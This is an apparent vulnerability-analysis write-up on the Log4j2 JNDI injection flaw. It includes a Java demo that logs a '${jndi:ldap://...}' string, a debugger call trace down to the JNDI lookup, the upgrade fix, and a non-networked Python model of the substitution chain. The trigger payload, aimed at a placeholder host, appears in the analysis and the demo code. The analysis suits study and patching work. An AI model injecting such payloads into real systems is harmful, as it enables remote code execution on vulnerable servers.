Log4j2 vulnerability reproduction

1. Vulnerability description

Log4j2 is a logging framework commonly used in Java development. This vulnerability is easy to trigger and has a severe impact.

2. Affected versions

log4j-core 2.x < 2.17.1

3. Vulnerability analysis

The payload that triggers the vulnerability is ${jndi:ldap://xxx.xxx.xx}
This string is unmistakably a JNDI injection signature; the function that triggers the vulnerability is JndiLookup.lookup()

  1. The trigger point in log4j2 is jndiManager.lookup(jndiName)

Write a simple vulnerable program and start tracing the exploitation chain from it

  import org.apache.logging.log4j.LogManager;
  import org.apache.logging.log4j.Logger;
  public class Log4jDemo {  // class name is arbitrary; needs a vulnerable log4j-core 2.x on the classpath
      private static final Logger logger = LogManager.getLogger(Log4jDemo.class);
      public static void main(String[] args) { logger.error("${jndi:ldap://1111.xxx.xxx.xxx}"); }  // the logged string is evaluated by the layout
  }
  • The full call chain is shown below:

Trace downward from logger.error until you reach this point; dynamic debugging shows which subclass is actually called at this step.
callAppender:84, AppenderControl (org.apache.logging.log4j.core.config)
log:63, DefaultReliabilityStrategy (org.apache.logging.log4j.core.config)
(If it is hard to follow, set a breakpoint directly in the second log function and keep stepping in.)
processLogEvent:498, LoggerConfig (org.apache.logging.log4j.core.config)
callAppenders:540, LoggerConfig (org.apache.logging.log4j.core.config)
This function contains a loop; setting the debugger condition to i == 8 jumps straight to the MessagePatternConverter class, which is the vulnerable class.
callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config)
callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config)
tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config)
append:181, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
encode:59, PatternLayout (org.apache.logging.log4j.core.layout)
At this point the event already holds the logged input string.
encode:229, PatternLayout (org.apache.logging.log4j.core.layout)
toText:244, PatternLayout (org.apache.logging.log4j.core.layout)
toSerializable:344, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout)
format:38, PatternFormatter (org.apache.logging.log4j.core.pattern)
format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern)
replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:1033, StrSubstitutor (org.apache.logging.log4j.core.lookup)
This is a while loop; after a series of operations it enters the resolveVariable function.
resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup)
The call chain at this point shows the many supported lookup types.
Step directly into the lookup method of the jndi lookup class and you find the jndiManager.lookup call
lookup:221, Interpolator (org.apache.logging.log4j.core.lookup)

4. Vulnerability fix

Upgrade to 2.17.1 or a later secure version.
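A simplified Python model of the chain traced above (StrSubstitutor.substitute, resolveVariable, the Interpolator and its jndi lookup), added here as an example; it is not log4j code. The lookup table, the sys values and the ldap URL in the test are constructed, and the jndi lookup only records the name it receives instead of making a JNDI request. The two flags model the fix: from 2.15 lookups inside the message body are off, and from 2.16 the jndi lookup is disabled unless explicitly enabled.

```python
import re

# Innermost ${...} (no nested "${"), so inner variables resolve first, like
# the while loop in StrSubstitutor.substitute() traced above.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

def make_interpolator(jndi_enabled):
    """Simplified Interpolator: prefix -> lookup. The jndi entry only records
    the name it was asked for instead of performing a JNDI/LDAP request."""
    jndi_calls = []

    def jndi(name):                        # stands in for jndiManager.lookup(name)
        jndi_calls.append(name)
        return "<remote object>"           # placeholder for the fetched object

    lookups = {
        "lower": str.lower,
        "upper": str.upper,
        "sys": {"app.name": "demo"}.get,   # constructed stand-in for System properties
    }
    if jndi_enabled:
        lookups["jndi"] = jndi
    return lookups, jndi_calls

def resolve_variable(var, lookups):
    """resolveVariable(): split 'prefix:key', dispatch; None = leave text as-is."""
    prefix, sep, key = var.partition(":")
    fn = lookups.get(prefix) if sep else None
    return fn(key) if fn else None

def substitute(text, lookups):
    """substitute(): keep replacing until a full pass resolves nothing."""
    while True:
        for m in INNERMOST.finditer(text):
            value = resolve_variable(m.group(1), lookups)
            if value is not None:
                text = text[:m.start()] + value + text[m.end():]
                break                      # text shifted: rescan from the start
        else:
            return text

def format_message(message, message_lookups_enabled, jndi_enabled):
    """MessagePatternConverter.format() from the trace: vulnerable builds
    substitute inside the message body; fixed builds skip that, and the jndi
    lookup is absent unless explicitly enabled."""
    lookups, jndi_calls = make_interpolator(jndi_enabled)
    if message_lookups_enabled:
        message = substitute(message, lookups)
    return message, jndi_calls
```

Calling format_message with both flags true reproduces the vulnerable path: the URL inside the logged message is handed to the jndi lookup; with either flag false the text is written out literally.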